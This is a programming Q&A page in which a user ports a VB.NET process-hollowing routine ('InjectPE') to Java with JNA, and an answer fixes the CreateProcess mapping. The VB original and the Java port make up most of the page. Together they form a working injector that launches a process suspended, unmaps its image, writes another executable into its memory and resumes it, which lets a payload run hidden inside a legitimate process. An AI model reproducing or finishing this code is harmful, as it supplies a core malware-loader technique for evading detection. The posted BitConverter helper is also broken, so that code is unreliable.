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I am trying to convert this VB code to Java:

Public Shared Function InjectPE(ByVal bytes As Byte(), ByVal surrogateProcess As String) As Boolean
    Try
        Dim procAttr As IntPtr = IntPtr.Zero
        Dim processInfo As IntPtr() = New IntPtr(3) {}
        Dim startupInfo As Byte() = New Byte(67) {}

        Dim num2 As Integer = BitConverter.ToInt32(bytes, 60)
        Dim num As Integer = BitConverter.ToInt16(bytes, num2 + 6)
        Dim ptr4 As New IntPtr(BitConverter.ToInt32(bytes, num2 + &H54))

        If CreateProcess(Nothing, New StringBuilder(surrogateProcess), procAttr, procAttr, False, 4, _
            procAttr, Nothing, startupInfo, processInfo) Then
            Dim ctxt As UInteger() = New UInteger(178) {}
            ctxt(0) = &H10002
            If GetThreadContext(processInfo(1), ctxt) Then
                Dim baseAddr As New IntPtr(ctxt(&H29) + 8L)

                Dim buffer__1 As IntPtr = IntPtr.Zero
                Dim bufferSize As New IntPtr(4)

                Dim numRead As IntPtr = IntPtr.Zero

                If ReadProcessMemory(processInfo(0), baseAddr, buffer__1, CInt(bufferSize), numRead) AndAlso (NtUnmapViewOfSection(processInfo(0), buffer__1) = 0) Then
                    Dim addr As New IntPtr(BitConverter.ToInt32(bytes, num2 + &H34))
                    Dim size As New IntPtr(BitConverter.ToInt32(bytes, num2 + 80))
                    Dim lpBaseAddress As IntPtr = VirtualAllocEx(processInfo(0), addr, size, &H3000, &H40)

                    Dim lpNumberOfBytesWritten As Integer

                    WriteProcessMemory(processInfo(0), lpBaseAddress, bytes, CUInt(CInt(ptr4)), lpNumberOfBytesWritten)
                    Dim num5 As Integer = num - 1
                    For i As Integer = 0 To num5
                        Dim dst As Integer() = New Integer(9) {}
                        Buffer.BlockCopy(bytes, (num2 + &HF8) + (i * 40), dst, 0, 40)
                        Dim buffer2 As Byte() = New Byte((dst(4) - 1)) {}
                        Buffer.BlockCopy(bytes, dst(5), buffer2, 0, buffer2.Length)

                        size = New IntPtr(lpBaseAddress.ToInt32() + dst(3))
                        addr = New IntPtr(buffer2.Length)

                        WriteProcessMemory(processInfo(0), size, buffer2, CUInt(addr), lpNumberOfBytesWritten)
                    Next
                    size = New IntPtr(ctxt(&H29) + 8L)
                    addr = New IntPtr(4)

                    WriteProcessMemory(processInfo(0), size, BitConverter.GetBytes(lpBaseAddress.ToInt32()), CUInt(addr), lpNumberOfBytesWritten)
                    ctxt(&H2C) = CUInt(lpBaseAddress.ToInt32() + BitConverter.ToInt32(bytes, num2 + 40))
                    SetThreadContext(processInfo(1), ctxt)
                End If
            End If
            ResumeThread(processInfo(1))
        End If
    Catch
        Return False
    End Try
    Return True
End Function

I have written the native call interfaces first.

Kernel32

import com.sun.jna.ptr.IntByReference;
import com.sun.jna.win32.StdCallLibrary;

public interface Kernel32 extends StdCallLibrary {

    boolean CreateProcess(String appName, String commandLine,
            IntByReference procAttr, IntByReference thrAttr, boolean inherit,
            int creation, IntByReference env, String curDir, byte[] sInfo,
            IntByReference[] pInfo);

    boolean GetThreadContext(IntByReference hThr, int[] ctxt);

    boolean ReadProcessMemory(IntByReference hProc, IntByReference baseAddr,
            IntByReference bufr, int bufrSize, IntByReference numRead);

    int ResumeThread(IntByReference hThread);

    boolean SetThreadContext(IntByReference hThr, int[] ctxt);

    IntByReference VirtualAllocEx(IntByReference hProc, IntByReference addr,
            IntByReference size, int allocType, int prot);

    boolean VirtualProtectEx(IntByReference hProcess, IntByReference lpAddress,
            IntByReference dwSize, int flNewProtect, int lpflOoldProtect);

    boolean WriteProcessMemory(IntByReference hProcess,
            IntByReference lpBaseAddress, byte[] lpBuffer, int nSize,
            int lpNumberOfBytesWritten);

}

NtDll

import com.sun.jna.ptr.IntByReference;
import com.sun.jna.win32.StdCallLibrary;

public interface NtDll extends StdCallLibrary {

    int NtUnmapViewOfSection(IntByReference hProc, IntByReference baseAddr);

}

After I had written the call interfaces I went on translating the function. I saw that I needed a BitConverter equivalent, so I wrote one.

import java.nio.ByteBuffer;
import java.nio.ByteOrder;

public final class BitConverter {

    public static byte[] getBytes(int value) {
        ByteBuffer buffer = ByteBuffer.allocate(4).order(
                ByteOrder.nativeOrder());
        buffer.putInt(value);
        return buffer.array();
    }

    public static short toInt16(byte[] bytes, int index) {
        if (bytes.length != 8)
            return -1;
        return (short) ((0xff & bytes[index]) << 8 | (0xff & bytes[index + 1]) << 0);
    }

    public static int toInt32(byte[] bytes, int index) {
        if (bytes.length != 4)
            return -1;
        return (int) ((int) (0xff & bytes[index]) << 56
                | (int) (0xff & bytes[index + 1]) << 48
                | (int) (0xff & bytes[index + 2]) << 40 | (int) (0xff & bytes[index + 3]) << 32);
    }

}

Now I was ready to write the function. I came up with this:

public static boolean injectPE(Kernel32 kernel, NtDll ntdll, String process,
        byte[] bytes) {
    IntByReference procAttr = new IntByReference(0);
    IntByReference[] processInfo = new IntByReference[3];
    byte[] startupInfo = new byte[67];

    int num2 = BitConverter.toInt32(bytes, 60);
    int num = BitConverter.toInt16(bytes, num2 + 6);
    IntByReference ptr4 = new IntByReference(BitConverter.toInt32(bytes,
            num2 + 0x54));

    if (kernel.CreateProcess(null, process, procAttr, procAttr, false, 4,
            procAttr, null, startupInfo, processInfo)) {
        int[] ctxt = new int[178];
        ctxt[0] = 0x10002;

        if (kernel.GetThreadContext(processInfo[1], ctxt)) {
            IntByReference baseAddr = new IntByReference(ctxt[0x29] + 8);

            IntByReference buffer__1 = new IntByReference(0);
            IntByReference bufferSize = new IntByReference(4);

            IntByReference numRead = new IntByReference(0);

            if (kernel.ReadProcessMemory(processInfo[0], baseAddr,
                    buffer__1, bufferSize.getValue(), numRead)
                    && ntdll.NtUnmapViewOfSection(processInfo[0], buffer__1) == 0) {
                IntByReference addr = new IntByReference(
                        BitConverter.toInt32(bytes, num2 + 0x34));
                IntByReference size = new IntByReference(
                        BitConverter.toInt32(bytes, num2 + 80));
                IntByReference lpBaseAddress = kernel.VirtualAllocEx(
                        processInfo[0], addr, size, 0x3000, 0x40);

                int lpNumberOfBytesWritten = 0;

                kernel.WriteProcessMemory(processInfo[0], lpBaseAddress,
                        bytes, ptr4.getValue(), lpNumberOfBytesWritten);
                int num5 = num - 1;
                for (int i = 0; i <= num5; i++) {
                    int[] dst = new int[9];
                    System.arraycopy(bytes, (num2 + 0xF8) + (i * 40), dst,
                            0, 40);
                    byte[] buffer2 = new byte[dst[4] - 1];
                    System.arraycopy(bytes, dst[5], buffer2, 0,
                            buffer2.length);

                    size = new IntByReference(lpBaseAddress.getValue()
                            + dst[3]);
                    addr = new IntByReference(buffer2.length);

                    kernel.WriteProcessMemory(processInfo[0], size,
                            buffer2, addr.getValue(),
                            lpNumberOfBytesWritten);
                }

                size = new IntByReference(ctxt[0x29] + 8);
                addr = new IntByReference(4);

                kernel.WriteProcessMemory(processInfo[0], size,
                        BitConverter.getBytes(lpBaseAddress.getValue()),
                        addr.getValue(), lpNumberOfBytesWritten);
                ctxt[0x2C] = lpBaseAddress.getValue()
                        + BitConverter.toInt32(bytes, num2 + 40);
                kernel.SetThreadContext(processInfo[1], ctxt);
            }
        }

        kernel.ResumeThread(processInfo[1]);

        return true;
    }

    return false;
}

The issue I am having is that when I run to test I get this error:

Exception in thread "main" java.lang.UnsatisfiedLinkError: Error looking up function 'CreateProcess': The specified procedure could not be found.

I do not know how to diagnose JNA errors, so I'm stuck at this point. Any help with this and help on other things is GREATLY appreciated. Thanks!

share|improve this question
    
return (int) ((int) (0xff & bytes[index]) << 56 etc <--- this will always be 0 –  fge Jan 20 '13 at 6:36
    
public static short toInt16(byte[] bytes, int index) { if (bytes.length != 8) return -1; return (short) ((0xff & bytes[index]) << 8 | (0xff & bytes[index + 1])); } public static int toInt32(byte[] bytes, int index) { if (bytes.length != 4) return -1; return (int) ((int) (0xff & bytes[index]) << 24 | (int) (0xff & bytes[index + 1]) << 16 | (int) (0xff & bytes[index + 2]) << 8 | (int) (0xff & bytes[index + 3]) << 32); } –  Jire Jan 20 '13 at 7:13
    
Fixed it, I just C&Pd the BitConverter code. –  Jire Jan 20 '13 at 7:13
    
IntByReference is never a valid return value. Use Pointer or an appropriate PointerType instead. –  technomage Jan 20 '13 at 15:01

1 Answer 1

up vote 1 down vote accepted

You can save yourself a bit of work by extending JNA's Kernel32 mapping provided in JNA's platform.jar instead of rolling your own.

If you use dependency walker to look at kernel32.dll, you'll see that CreateProcess does not exist within the DLL, but CreateProcessA and CreateProcessW do exist. Most w32 API functions come in "ansii" and "unicode" flavors, and differ in their definition of strings (LPCTSTR); the former uses char* and the latter uses wchar_t*. Note that you should only map Java String where you see LPCTSTR (constant string); if the type is LPTSTR you must use a byte[] or char[] as appropriate.

If you look at the initialization of JNA's Kernel32 mapping, you'll see that it uses W32API_UNICODE_OPTIONS, which automatically handles the translation from CreateProcess to CreateProcessW (as well as letting you use Java String for native strings instead of having to explicitly use JNA's WString).

share|improve this answer
    
By changing the method name from CreateProcess to CreateProcessW I believe JNA was able to successfully map without me having to change the String arguments to char[], although, it is returning false. –  Jire Jan 20 '13 at 19:32
    
Method name mapping has nothing to do with how JNA maps types. However, if you choose one native method over another, it has everything to do with the types you need to use with the mapping. –  technomage Jan 20 '13 at 20:18

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